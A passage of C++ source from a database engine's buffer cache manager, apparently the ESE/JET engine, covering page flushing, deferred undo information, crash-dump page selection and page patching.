" cLatchConflicts = %Iu\r\n"
" cPageFlushesDisallowed = %Iu\r\n"
" cPageTouchesTooRecent = %Iu\r\n"
" cPagesAbandoned = %Iu",
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.GetInstance( PinstFromIfmp( ifmp ) ) ),
ifmp,
cRetryFlush,
cTooManyOutstandingIOs,
cRemainingDependencies,
cPagesBeingFlushed,
cPageFlushesPending,
cLatchConflicts,
cPageFlushesDisallowed,
cPageTouchesTooRecent,
cPagesAbandoned ) );
// we have an existing BF FMP Context
FMP* pfmp = &g_rgfmp[ ifmp ];
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp )
{
Assert( pbffmp->fCurrentlyAttached );
// make sure that if we are performing a full flush that there are no
// entries pointing to dirty buffers in the OB0 Index. there can be
// entries pointing to clean buffers because of the way we maintain
// this index
BFOB0::ERR errOB0;
BFOB0::CLock lockOB0;
pbffmp->bfob0.MoveBeforeFirst( &lockOB0 );
while ( pbffmp->bfob0.ErrMoveNext( &lockOB0 ) != BFOB0::ERR::errNoCurrentEntry )
{
PBF pbf;
errOB0 = pbffmp->bfob0.ErrRetrieveEntry( &lockOB0, &pbf );
Assert( errOB0 == BFOB0::ERR::errSuccess );
// while we can have clean buffers, we do not expect evicted (in available or quiesced)
// state buffers to still be in OB0.
AssertTrack( !pbf->fAvailable && !pbf->fQuiesced, "EvictedBufferInOB0" );
AssertTrack( pbf->icbBuffer != icbPage0, "FullyDehydratedBufferInOB0" );
// if we're only flushing pages from a specific btree of this IFMP
// or from a specific range, skip any that don't match
//
// HACK: we are touching the page without the latch!
if ( ( ( objidNil != objidFDP ) &&
( objidFDP != ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP ) ) ||
( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) ) ||
( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) ) )
{
continue;
}
Enforce( err < JET_errSuccess || pbf->bfdf == bfdfClean );
}
pbffmp->bfob0.UnlockKeyPtr( &lockOB0 );
pbffmp->critbfob0ol.Enter();
PBF pbfNext;
for ( PBF pbf = pbffmp->bfob0ol.PrevMost(); pbf != pbfNil; pbf = pbfNext )
{
pbfNext = pbffmp->bfob0ol.Next( pbf );
// if we're only flushing pages from a specific btree of this IFMP
// or from a specific range, skip any that don't match
//
// HACK: we are touching the page without the latch!
if ( ( ( objidNil != objidFDP ) &&
( objidFDP != ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP ) ) ||
( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) ) ||
( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) ) )
{
continue;
}
Enforce( err < JET_errSuccess || pbf->bfdf == bfdfClean );
}
pbffmp->critbfob0ol.Leave();
}
pfmp->LeaveBFContextAsWriter();
// clear OB0 after a full flush (code borrowed from BFPurge())
if ( ( JET_errSuccess <= err ) &&
( objidNil == objidFDP ) &&
( pgnoNull == pgnoFirst ) && ( pgnoNull == pgnoLast ) )
{
// loop until we have cleared OB0 for this IFMP
BOOL fRetry = fFalse;
do {
fRetry = fFalse;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->ifmp != ifmp )
{
continue;
}
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
if ( pbf->ifmp == ifmp )
{
BFIResetLgposOldestBegin0( pbf );
}
pbf->sxwl.ReleaseExclusiveLatch();
}
else
{
Assert( errSXWL == CSXWLatch::ERR::errLatchConflict );
fRetry = fTrue;
}
}
if ( fRetry )
{
UtilSleep( dtickFastRetry );
}
}
while ( fRetry );
}
// wait here until we are sure we are done referencing this FMP or its INST by
// background threads. Remember there are many global background threads like
// scavenge pages / LRU-K, idle flush, or shrink ... not just the inst tied
// checkpoint advancement and this call to ErrBFFlush.
(void)CBFIssueList::ErrSync();
if ( err >= JET_errSuccess )
{
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfFlushSucceed|sysosrtlContextFmp, pfmp, &ifmp, sizeof(ifmp) );
}
else
{
ULONG rgul[4] = { (ULONG)ifmp, (ULONG)err, PefLastThrow()->UlLine(), UlLineLastCall() };
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfFlushFail|sysosrtlContextFmp, pfmp, rgul, sizeof(rgul) );
}
Assert( g_rgfmp[ifmp].Pfapi() ||
( PinstFromIfmp( ifmp )->FRecovering() &&
( !g_rgfmp[ifmp].FAttached() ||
g_rgfmp[ifmp].FDeferredAttach() ||
g_rgfmp[ifmp].FSkippedAttach() ) ) ||
( _wcsicmp ( SzParam( PinstFromIfmp( ifmp ), JET_paramRecovery ), wszOn ) != 0 ) ||
( !PinstFromIfmp( ifmp )->m_fJetInitialized ) );
if ( err >= JET_errSuccess && g_rgfmp[ifmp].Pfapi() )
{
err = ErrIOFlushDatabaseFileBuffers( ifmp, iofrFlushIfmpContext );
}
// return the result of the flush operation
AssertTrack( errBfFlushLoop >= JET_errSuccess || err == errBfFlushLoop, "ErrBFFlushLostFlushLoopErr" ); // ensure we don't clobber the proper flush error.
return err;
}
ERR ErrBFFlushSync( IFMP ifmp )
{
ERR err = JET_errSuccess;
// scan through all initialized BFs looking for cached pages from this
// IFMP
CBFIssueList bfil;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// if this BF doesn't contain a cached page from this IFMP, skip it now
if ( pbf->ifmp != ifmp )
{
continue;
}
// if we can't exclusively latch this BF, skip it now
if ( pbf->sxwl.ErrTryAcquireExclusiveLatch() != CSXWLatch::ERR::errSuccess )
{
continue;
}
// if this BF is undergoing IO, skip it now
if ( !FBFIUpdatablePage( pbf ) )
{
pbf->sxwl.ReleaseExclusiveLatch();
continue;
}
// if this BF is clean, skip it now
if ( pbf->bfdf == bfdfClean )
{
pbf->sxwl.ReleaseExclusiveLatch();
continue;
}
// if this BF has a dependency of any kind whatsoever, fail the flush
const ERR errPrepareFlush = ErrBFIPrepareFlushPage( pbf, bfltExclusive, IOR( iorpBFDatabaseFlush ), qosIODispatchImmediate, fFalse );
if ( errPrepareFlush < JET_errSuccess )
{
pbf->sxwl.ReleaseExclusiveLatch();
OSTrace(
JET_tracetagBufferManager,
OSFormat( "ErrBFIPrepareFlushPage: pgno=%u:%u errPrepareFlush=%d", (ULONG)pbf->ifmp, pbf->pgno, errPrepareFlush ) );
if ( errPrepareFlush == JET_errOutOfMemory || errPrepareFlush == JET_errOutOfBuffers )
{
Error( errPrepareFlush );
}
else
{
Error( ErrERRCheck( JET_errDiskIO ) );
}
}
Assert( !bfil.FEmpty() ); // log should've flushed.
// write this BF to the database
TraceContextScope tcScope( iorpBFDatabaseFlush );
err = ErrBFISyncWrite( pbf, bfltExclusive, qosIODispatchImmediate, *tcScope );
pbf->sxwl.ReleaseExclusiveLatch();
if ( err < JET_errSuccess )
{
Call( err );
}
}
HandleError:
// issue any queued writes and log flushes, synchronously if possible
CallS( bfil.ErrIssue( fTrue ) );
return err;
}
///////////////////////////////
// Deferred Undo Information
void BFAddUndoInfo( const BFLatch* pbfl, RCE* prce )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( prce->PgnoUndoInfo() == pgnoNull );
Assert( prce->PrceUndoInfoNext() == prceInvalid );
// add the undo info to the BF
PBF pbf = PBF( pbfl->dwContext );
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbf ) );
BFIAddUndoInfo( pbf, prce );
}
void BFRemoveUndoInfo( RCE* const prce, const LGPOS lgposModify )
{
// validate IN args
Assert( prce != prceNil );
// try forever to remove the deferred undo information in this RCE
while ( prce->PgnoUndoInfo() != pgnoNull )
{
// the IFMP / PGNO of the undo info in this RCE is in the cache
//
// NOTE: as long as we hold the read lock on this IFMP / PGNO, any
// BF we find cannot be evicted
BFHash::CLock lockHash;
g_bfhash.ReadLockKey( IFMPPGNO( prce->Ifmp(), prce->PgnoUndoInfo() ), &lockHash );
PGNOPBF pgnopbf;
if ( g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf ) == BFHash::ERR::errSuccess )
{
// lock the undo info chain on this BF
CCriticalSection* const pcrit = &g_critpoolBFDUI.Crit( pgnopbf.pbf );
pcrit->Enter();
// the IFMP / PGNO of the undo info in this RCE has undo info on
// this page
if ( prce->PgnoUndoInfo() == pgnopbf.pbf->pgno &&
prce->Ifmp() == pgnopbf.pbf->ifmp )
{
// this page has no versions
if ( pgnopbf.pbf->pbfTimeDepChainNext == pbfNil )
{
#ifdef DEBUG
// we know that the undo info must be on this BF
RCE* prceT;
for ( prceT = pgnopbf.pbf->prceUndoInfoNext;
prceT != prceNil && prceT != prce;
prceT = prceT->PrceUndoInfoNext() )
{
}
Assert( prceT == prce );
#endif // DEBUG
// if we are removing this undo info as a part of a lazy commit,
// we must depend the page on the commit record. this is so
// that if we log the commit record, remove the undo info,
// flush the page, and then crash before flushing the commit
// record to the log, we will not be stranded without our undo
// info
//
// NOTE: this will also set the dependency for a durable
// commit, but it will not delay the flush of the buffer because
// by the time we get here, the commit record has already been
// flushed
//
// NOTE: the only reason it is safe to modify lgposModify
// without the page latch is because both lgposModify and
// this undo info are preventing the page from being flushed.
// as long as at least one keeps the BF from being flushed,
// we can change the other
FMP* pfmp = &g_rgfmp[ prce->Ifmp() ];
PIB* ppib = prce->Pfucb()->ppib;
if ( ppib->Level() == 1 &&
pfmp->FLogOn() &&
CmpLgpos( &ppib->lgposCommit0, &lgposMax ) != 0 )
{
Assert( !pfmp->Pinst()->m_plog->FLogDisabled() );
BFISetLgposModify( pgnopbf.pbf, ppib->lgposCommit0 );
}
// remove our undo info
BFIRemoveUndoInfo( pgnopbf.pbf, prce, lgposModify );
// unlock the undo info chain
pcrit->Leave();
}
// this page may have versions
else
{
// unlock the undo info chain
pcrit->Leave();
// lock the time dependency chain if the source page has versions
// so that no one can add or remove versions while we are
// looking for our undo info
ENTERCRITICALSECTION ecsDepend( &g_critBFDepend );
// scan all versions of this page
for ( PBF pbfVer = pgnopbf.pbf;
pbfVer != pbfNil;
pbfVer = pbfVer->pbfTimeDepChainNext )
{
// lock this undo info chain
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbfVer ) );
// Page dependencies were removed, so in theory walking the dependency chain
                        // should leave us on the same ifmp & pgno, unless the RCE has been processed
// externally while the DUI lock was released for a moment above, in which case
// prce->PgnoUndoInfo() will be pgnoNull.
Expected( prce->Ifmp() == pbfVer->ifmp );
Expected( prce->PgnoUndoInfo() == pbfVer->pgno || prce->PgnoUndoInfo() == pgnoNull );
// the IFMP / PGNO of the undo info in this RCE has undo info
// on this page
if ( prce->PgnoUndoInfo() == pbfVer->pgno &&
prce->Ifmp() == pbfVer->ifmp )
{
// this BF contains our undo info
RCE* prceT;
for ( prceT = pbfVer->prceUndoInfoNext;
prceT != prceNil && prceT != prce;
prceT = prceT->PrceUndoInfoNext() )
{
}
if ( prceT != prceNil )
{
// if we are removing this undo info as a part
// of a lazy commit, we must depend the page on
// the commit record. this is so that if we
// log the commit record, remove the undo info,
// flush the page, and then crash before flushing
// the commit record to the log, we will not be
// stranded without our undo info
//
// NOTE: this will also set the dependency for
// a durable commit, but it will not delay the
// flush of the buffer because by the time we
// get here, the commit record has already been
// flushed
//
// NOTE: the only reason it is safe to modify
// lgposModify without the page latch is because
// both lgposModify and this undo info are
// preventing the page from being flushed. as
// long as at least one keeps the BF from being
// flushed, we can change the other
FMP* pfmp = &g_rgfmp[ prce->Ifmp() ];
PIB* ppib = prce->Pfucb()->ppib;
if ( ppib->Level() == 1 &&
pfmp->FLogOn() &&
CmpLgpos( &ppib->lgposCommit0, &lgposMax ) != 0 )
{
Assert( !pfmp->Pinst()->m_plog->FLogDisabled() );
BFISetLgposModify( pbfVer, ppib->lgposCommit0 );
}
// remove our undo info
BFIRemoveUndoInfo( pbfVer, prce, lgposModify );
// we're done
break;
}
}
// this RCE doesn't have undo info on this page
else
{
// stop looking on this page
break;
}
}
}
}
// this RCE doesn't have undo info on this page
else
{
// unlock the undo info chain
pcrit->Leave();
}
} // g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf ) == BFHash::errSuccess )
g_bfhash.ReadUnlockKey( &lockHash );
}
// validate OUT args
Assert( prce->PgnoUndoInfo() == pgnoNull );
}
//////////////////////
// Debugger Support
typedef CTable< DWORD_PTR, CPagePointer > CReferencedPages;
inline INT CReferencedPages::CKeyEntry:: Cmp( const DWORD_PTR& dw ) const
{
return (INT)( DwPage() - dw );
}
inline INT CReferencedPages::CKeyEntry:: Cmp( const CReferencedPages::CKeyEntry& keyentry ) const
{
return Cmp( keyentry.DwPage() );
}
#pragma warning( disable : 4509 ) // nonstandard extension used: 'function' uses SEH and 'object' has destructor
void BFIBuildReferencedPageListForCrashDump( CReferencedPages * ptableReferencedPages )
{
CArray< CPagePointer > arrayReferencedPages;
TRY
{
// for each instance...
for ( size_t ipinst = 0; ipinst < g_cpinstMax; ipinst++ )
{
const INST * const pinst = g_rgpinst[ ipinst ];
if ( pinstNil != pinst )
{
// for each session of the instance...
for ( PIB * ppib = pinst->m_ppibGlobal; ppibNil != ppib; ppib = ppib->ppibNext )
{
// for each cursor of the session...
for ( FUCB * pfucb = ppib->pfucbOfSession; pfucbNil != pfucb; pfucb = pfucb->pfucbNextOfSession )
{
void * const pvPage = pfucb->csr.PvBufferForCrashDump();
if ( NULL != pvPage )
{
CPagePointer pagepointer( (DWORD_PTR)pvPage );
// try to add the page to the list, but
// just ignore any errors (it simply
// means that the page won't be included
// in our list of referenced pages)
(void) arrayReferencedPages.ErrSetEntry( arrayReferencedPages.Size(), pagepointer );
}
}
}
}
}
}
EXCEPT( efaExecuteHandler )
{
// set a flag to indicate that we hit some sort
// of fatal error (purely for diagnostic purposes
// so that if someone's looking at a dump that
// should have some referenced pages in it, but
// doesn't, then this flag will tell us if it was
// because some fatal error occurred building up
// the referenced page list)
g_fBFErrorBuildingReferencedPageListForCrashDump = fTrue;
}
// load the table of referenced pages with the array
// of referenced pages, ignoring any errors (it
// simply means that we won't have a list of
// referenced pages to work with)
(void) ptableReferencedPages->ErrCloneArray( arrayReferencedPages );
}
INLINE BOOL FBFIMismatchedVMPageInCrashDump(
const BYTE * const pbPage,
const size_t cbPage,
const BYTE * const pbVMPage,
const size_t cbVMPage )
{
BOOL fMismatch = fFalse;
if ( cbPage > cbVMPage )
{
// database page size greater than VM page size
if ( pbVMPage < pbPage || pbVMPage + cbVMPage > pbPage + cbPage )
{
fMismatch = fTrue;
}
}
else if ( cbPage < cbVMPage )
{
// database page size smaller than VM page size
if ( pbPage < pbVMPage || pbPage + cbPage > pbVMPage + cbVMPage )
{
fMismatch = fTrue;
}
}
else
{
// database page size equal to VM page size
if ( pbPage != pbVMPage )
{
fMismatch = fTrue;
}
}
return fMismatch;
}
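// To make the containment test above concrete, here is a worked example with illustrative
// sizes only (the real sizes come from g_rgcbPageSize and OSMemoryPageCommitGranularity()):
// with a 32 KB database page at pbPage and 4 KB VM pages, a VM page starting at
// pbPage + 0x2000 lies entirely inside [ pbPage, pbPage + 0x8000 ) and is not a mismatch,
// while a VM page starting at pbPage - 0x1000 is.  Conversely, with 4 KB database pages
// and a 64 KB VM page, the database page must lie entirely inside the VM page; when the
// sizes are equal the two pointers must match exactly.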
ERR
ErrBFIInspectForInclusionInCrashDump(
const IBF ibf,
const JET_GRBIT grbit,
const VOID *pvVMPage,
const size_t cbVMPage,
CReferencedPages &tableReferencedPages,
BOOL *pfIncludeVMPage )
{
ERR err = JET_errSuccess;
TRY
{
const PBF pbf = PbfBFICacheIbf( ibf );
cBFInspectedForInclusionInCrashDump++;
if ( NULL == pbf->pv
|| pbf->fQuiesced
|| pbf->fAvailable
|| JET_errPageNotInitialized == pbf->err
|| errBFIPageFaultPending == pbf->err )
{
// ignore the following types of BF's/pages:
//
// 1) BF's with a NULL pv, which should be impossible
// (since we only inspect BF's up to cbfCacheAddressable) -- but
// we'll handle it just in case I've missed some corner
// cases or something
//
// 2) quiesced BF's or BF's in the avail pool, since
// neither is likely to contain interesting/useful data
//
// 3) uninitialized pages, since we don't care about
// pages that are just all full of zeroes
//
// 4) pages that are currently being faulted in, since the
// state of the buffer is unknown (it's in the midst of
// being filled)
cBFMayBeRemovedFromCrashDump++;
}
// if we see a mismatch between the BF and the VM page
// then don't touch it to be on the safe side
else if ( pvVMPage != NULL &&
FBFIMismatchedVMPageInCrashDump( (BYTE *)pbf->pv, g_rgcbPageSize[pbf->icbBuffer], (BYTE *)pvVMPage, cbVMPage ) )
{
*pfIncludeVMPage = fTrue;
cBFMismatchedVMPageIncludedInCrashDump++;
}
// if the caller asked for dirty pages and this page is dirty
// then include it in the crash dump
        else if ( ( ( grbit & JET_bitDumpCacheIncludeDirtyPages ) != 0 &&
                      pbf->bfdf > bfdfUntidy ) ||
                    ( grbit & JET_bitDumpCacheMaximum ) != 0 )
{
*pfIncludeVMPage = fTrue;
cBFDirtiedPageIncludedInCrashDump++;
}
// if the caller asked for cached pages and this page holds
// a valid database page then include it in the crash dump
        else if ( ( ( grbit & JET_bitDumpCacheIncludeCachedPages ) != 0 &&
                      ( pbf->ifmp != ifmpNil || pbf->pgno != pgnoNull ) ) ||
                    ( grbit & JET_bitDumpCacheMaximum ) != 0 )
{
*pfIncludeVMPage = fTrue;
cBFCachedPageIncludedInCrashDump++;
}
// we always include latched pages in the crash dump
else if ( pbf->sxwl.FLatched() )
{
*pfIncludeVMPage = fTrue;
cBFLatchedPageIncludedInCrashDump++;
}
// we always include referenced pages in the crash dump
else if ( tableReferencedPages.SeekEQ( DWORD_PTR( pbf->pv ) ) )
{
*pfIncludeVMPage = fTrue;
cBFReferencedPageIncludedInCrashDump++;
}
// we always include recently-touched pages in the crash dump
else if ( g_bflruk.FRecentlyTouched( pbf, 2000 ) ) // within 2 seconds
{
*pfIncludeVMPage = fTrue;
cBFRecentlyTouchedPageIncludedInCrashDump++;
}
// we always include pages flagged with an error code in the
// crash dump
//
// BUGBUG: This is not selective enough, weed out non-fatal error cases
else if ( JET_errSuccess != pbf->err &&
errBFIPageNotVerified != pbf->err ) // this error is handled below
{
*pfIncludeVMPage = fTrue;
cBFErrorIncludedInCrashDump++;
}
// want to see pages that have completed IO for now ...
else if ( NULL != pbf->pWriteSignalComplete )
{
*pfIncludeVMPage = fTrue;
cBFIOIncludedInCrashDump++;
}
// if the caller asked for corrupted pages, then
// include all non-verified pages in the crash dump
        else if ( ( ( grbit & JET_bitDumpCacheIncludeCorruptedPages ) != 0 &&
                      ( errBFIPageNotVerified == pbf->err ||
                        errBFIPageRemapNotReVerified == pbf->err ) ) ||
                    ( grbit & JET_bitDumpCacheMaximum ) != 0 )
{
*pfIncludeVMPage = fTrue;
cBFUnverifiedIncludedInCrashDump++;
}
// the page may be removed from the crash dump (though
// if the VM page size is greater than the database
// page size, then the VM page may actually end up
// getting included anyway due to other BF's on the
// page requiring inclusion)
else
{
cBFMayBeRemovedFromCrashDump++;
}
}
EXCEPT( efaExecuteHandler )
{
err = ErrERRCheck( JET_errInternalError );
}
return err;
}
ERR ErrBFConfigureProcessForCrashDump( const JET_GRBIT grbit )
{
JET_ERR err = JET_errSuccess;
CReferencedPages tableReferencedPages;
    // WARNING: Allocating memory or taking a lock (or, more generally, calling the OS)
    // inside this function (or its children) risks a deadlock. The caller has frozen
    // all other threads in arbitrary states, and no lock held by another thread can
    // be released.
    // turn off asserts while we are preparing a crash dump.  this is necessary
// because an assert that happens inside the try/except below will cause
// an infinite loop when we hit ErrERRCheck in the except.
UINT aaOriginal = COSLayerPreInit::SetAssertAction( JET_AssertSkipAll );
if ( grbit & JET_bitDumpUnitTest )
{
// verifies asserts are now ignored
Assert( 0 );
}
// record that the caller has requested that the cache be configured for a
// crash dump
g_tickBFPreparingCrashDump = TickOSTimeCurrent();
// skip early outs for the unit test
if ( !( grbit & JET_bitDumpUnitTest ) && !BoolParam( JET_paramEnableViewCache ) )
{
// if the caller requested the maximum amount of information then we have
// nothing to remove from the crash dump
if ( grbit & JET_bitDumpCacheMaximum )
{
Error( JET_errSuccess );
}
// if the process is already pretty small then don't bother to trim the
// contents of the crash dump
if ( OSMemoryPageWorkingSetPeak() < 100 * 1024 * 1024 )
{
Error( JET_errSuccess );
}
// if the cache is already relatively small then no need to trim
if ( cbfInit < ( 100 * 1024 * 1024 ) / g_cbPageMax )
{
Error( JET_errSuccess );
}
}
// if the cache manager isn't initialized then leave the dump alone
if ( !g_fBFInitialized )
{
Error( ErrERRCheck( JET_errNotInitialized ) );
}
// since we are likely being called in the event of a process crash, we
// must very carefully validate our input data to minimize the chance of
// another crash
if ( OSMemoryPageCommitGranularity() == 0 ||
g_icbCacheMax == icbPageInvalid ||
cbfInit == 0 ||
g_rgpbfChunk == NULL ||
g_cbfChunk == 0 ||
( !BoolParam( JET_paramEnableViewCache ) &&
( g_rgpvChunk == NULL ||
g_cpgChunk == 0 ) ) )
{
Error( ErrERRCheck( JET_errIllegalOperation ) );
}
// build the list of currently-referenced pages
BFIBuildReferencedPageListForCrashDump( &tableReferencedPages );
if ( !BoolParam( JET_paramEnableViewCache ) )
{
// If we are not decommitting, nothing to do in this mode
if ( grbit & JET_bitDumpCacheNoDecommit )
{
Error( JET_errSuccess );
}
// compute the parameters required to walk the cache by VM page
const size_t cbVMPage = OSMemoryPageCommitGranularity();
size_t cbitVMPage;
for ( cbitVMPage = 0; (size_t)1 << cbitVMPage != cbVMPage; cbitVMPage++ );
const size_t cbfVMPage = max( 1, cbVMPage / g_rgcbPageSize[g_icbCacheMax] );
const size_t cpgBF = max( 1, g_rgcbPageSize[g_icbCacheMax] / cbVMPage );
// walk every VM chunk of the cache
//
// we inspect BF's up to cbfInit, as opposed to cbfCacheAddressable,
// in case some BF's beyond cbfCacheAddressable have yet to be
// decommitted, so we will do that now (but in any
// case, we only go up to the first NULL chunk, because
// all chunks beyond that will also be NULL)
for ( size_t iCacheChunk = 0, ibf = 0;
ibf < (size_t)cbfInit && iCacheChunk < cCacheChunkMax && NULL != g_rgpvChunk[ iCacheChunk ];
iCacheChunk++ )
{
const size_t iVMPageMin = (size_t)g_rgpvChunk[ iCacheChunk ] >> cbitVMPage;
const size_t iVMPageMax = iVMPageMin + ( g_cpgChunk * g_rgcbPageSize[g_icbCacheMax] >> cbitVMPage );
BOOL fIncludeVMPage = fFalse;
size_t ipgBF = 0;
// walk every VM page of this chunk
for ( size_t iVMPage = iVMPageMin; ibf < (size_t)cbfInit && iVMPage < iVMPageMax; iVMPage++ )
{
void* const pvVMPage = (void*)( iVMPage << cbitVMPage );
if ( 0 != ipgBF )
{
// if ipgBF is non-zero, it must mean that the
// database page size is greater than the VM page
// size, so whatever we decided for the first VM
// page corresponding to this BF, make the same
// decision for the rest of this BF's VM pages
NULL;
}
else
{
// walk every BF corresponding to this VM page and
// determine if any of them should be included in
// the crash dump
for ( IBF ibfT = ibf; ibfT < cbfCacheAddressable && ibfT < IBF( ibf + cbfVMPage ); ibfT++ )
{
err = ErrBFIInspectForInclusionInCrashDump( ibfT, grbit, pvVMPage, cbVMPage, tableReferencedPages, &fIncludeVMPage );
}
}
// if none of the BFs on this VM page should be included in the
// crash dump then decommit the VM page
//
// NOTE: I really hope we are the only running thread in the
// process at this point. Seriously.
if ( fIncludeVMPage )
{
cBFVMPagesIncludedInCrashDump++;
}
else
{
OSMemoryPageDecommit( pvVMPage, cbVMPage );
cBFVMPagesRemovedFromCrashDump++;
// don't bother tracking cache statistics and performance counters here, we're
// about to crash anyways.
}
// advance our current BF pointer as we walk VM pages
if ( ++ipgBF >= cpgBF )
{
fIncludeVMPage = fFalse;
ipgBF = 0;
ibf += cbfVMPage;
}
}
}
}
else // BoolParam( JET_paramEnableViewCache )
{
BOOL fIncludePage;
for ( IBF ibf = 0; ibf < cbfCacheAddressable; ibf++ )
{
fIncludePage = fFalse;
err = ErrBFIInspectForInclusionInCrashDump( ibf, grbit, NULL, 0, tableReferencedPages, &fIncludePage );
if ( fIncludePage )
{
const PBF pbf = PbfBFICacheIbf( ibf );
OSErrorRegisterForWer( pbf->pv, g_rgcbPageSize[pbf->icbBuffer] );
cBFVMPagesIncludedInCrashDump++;
}
}
}
HandleError:
// note that we completed the crash dump preparation
g_tickBFCrashDumpPrepared = TickOSTimeCurrent();
g_errBFCrashDumpResult = err;
// there are no "fatal" errors here. we will record any errors in the
// dump itself
COSLayerPreInit::SetAssertAction( aaOriginal );
return JET_errSuccess;
}
#pragma warning( default : 4509 ) // nonstandard extension used: 'function' uses SEH and 'object' has destructor
////////////////////////////////
// BFFMP context manipulation
void BFSetBFFMPContextAttached( IFMP ifmp )
{
// flag our FMP context as (re-)attached
//
FMP* pfmp = &g_rgfmp[ ifmp ];
if ( pfmp->FBFContext() )
{
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
if ( pbffmp )
{
pbffmp->fCurrentlyAttached = fTrue;
}
pfmp->LeaveBFContextAsWriter();
}
#ifdef PERFMON_SUPPORT
// scan the cache and fixup stats on the formerly unattached FMP
//
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->ifmp != ifmp )
{
continue;
}
PERFOpt( cBFCache.Inc( PinstFromIfmp( ifmp ), pbf->tce, ifmp ) );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Inc( PinstFromIfmp( ifmp ), pbf->tce ) );
}
PERFOpt( g_cbCacheUnattached -= g_rgcbPageSize[pbf->icbBuffer] );
}
#endif
}
void BFResetBFFMPContextAttached( IFMP ifmp )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
#ifdef PERFMON_SUPPORT
// scan the cache and fixup stats on the formerly attached FMP
//
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->ifmp != ifmp )
{
continue;
}
PERFOpt( cBFCache.Dec( PinstFromIfmp( ifmp ), pbf->tce, ifmp ) );
if ( pbf->err == errBFIPageNotVerified )
{
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( ifmp ), pbf->tce ) );
}
PERFOpt( g_cbCacheUnattached += g_rgcbPageSize[pbf->icbBuffer] );
}
#endif
// flag our FMP context as unattached
//
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = ( BFFMPContext* )pfmp->DwBFContext();
if ( pbffmp )
{
Assert( pbffmp );
pbffmp->fCurrentlyAttached = fFalse;
}
pfmp->LeaveBFContextAsWriter();
}
// This API is also used to force good data onto disk, removing database corruption.
ERR ErrBFPatchPage(
__in const IFMP ifmp,
__in const PGNO pgno,
__in_bcount(cbToken) const void * pvToken,
__in const INT cbToken,
__in_bcount(cbPageImage) const void * pvPageImage,
__in const INT cbPageImage )
{
ERR err = JET_errSuccess;
BFLatch bfl;
BFLRUK::CLock lockLRUK;
bool fLockedLRUK = false;
PBF pbf = NULL;
CPAGE cpage;
TraceContextScope tcPatchPage( iorpPatchFix );
// no way to find out the TCE and it doesn't matter in this rare case
tcPatchPage->nParentObjectClass = tceNone;
//
// new page
//
OSTrace(
JET_tracetagBufferManager,
OSFormat( "Patching ifmp:pgno %d:%d", (ULONG)ifmp, pgno ) );
// if we ever get a flood of page patches, consider qosIODispatchBackground or something similar.
Call( ErrBFILatchPage( &bfl, ifmp, pgno, BFLatchFlags( bflfNoFaultFail | bflfNoEventLogging ), bfltWrite, BfpriBFMake( PctFMPCachePriority( ifmp ), (BFTEMPOSFILEQOS)qosIODispatchImmediate ), *tcPatchPage ) );
CallSx( err, wrnBFPageFault );
pbf = (PBF) bfl.dwContext;
    // Need a clean page with no oldestBegin0 and no lgposModify because
    // we write the patched page to disk.  Consider, for instance, a scenario
    // where we try to read the page straight from disk, get an error, and
    // issue a page patch request while the page is still in the cache and dirty.
if ( pbf->bfdf > bfdfUntidy )
{
Error( ErrERRCheck( JET_errDatabaseInUse ) );
}
else if ( pbf->bfdf == bfdfUntidy )
{
        // To clean a modified page we must reset the checksum
SetPageChecksum( pbf->pv, CbBFIBufferSize(pbf), databasePage, pbf->pgno );
pbf->bfdf = bfdfClean;
}
Assert( bfdfClean == pbf->bfdf );
// Want a full sized page
BFIRehydratePage( pbf );
// Validate the basic assumptions that must be true on successful w-latch
Enforce( pbf->ifmp == ifmp );
Enforce( pbf->pgno == pgno );
Enforce( FBFICurrentPage( pbf, ifmp, pgno ) );
Enforce( FBFIUpdatablePage( pbf ) );
    // Since we know the page is clean, we can reset this.  This issue is noted in
    // BFIDirtyPage; once it is solved, we should be able to assert that lgposOldestBegin0
    // is lgposMax.
BFIResetLgposOldestBegin0( pbf );
//
// update / patch the page
//
BOOL fPatched = fFalse;
Call( PagePatching::ErrDoPatch( ifmp, pgno, &bfl, pvToken, cbToken, pvPageImage, cbPageImage, &fPatched ) );
if ( !fPatched )
{
// Ignore patching attempt on page with no active patch request
// Maybe we should error out, but there are tests that depend on
// this not erroring out
goto HandleError;
}
//
// write page
//
// if this BF has a dependency of any kind whatsoever, fail the flush
err = ErrBFITryPrepareFlushPage( pbf, bfltWrite, IOR( iorpPatchFix ), qosIODispatchImmediate, fFalse );
if ( err < JET_errSuccess )
{
Error( ErrERRCheck( JET_errDatabaseInUse ) );
}
BFIAssertReadyForWrite( pbf );
Assert( 0 == CmpLgpos( pbf->lgposModify, lgposMin ) );
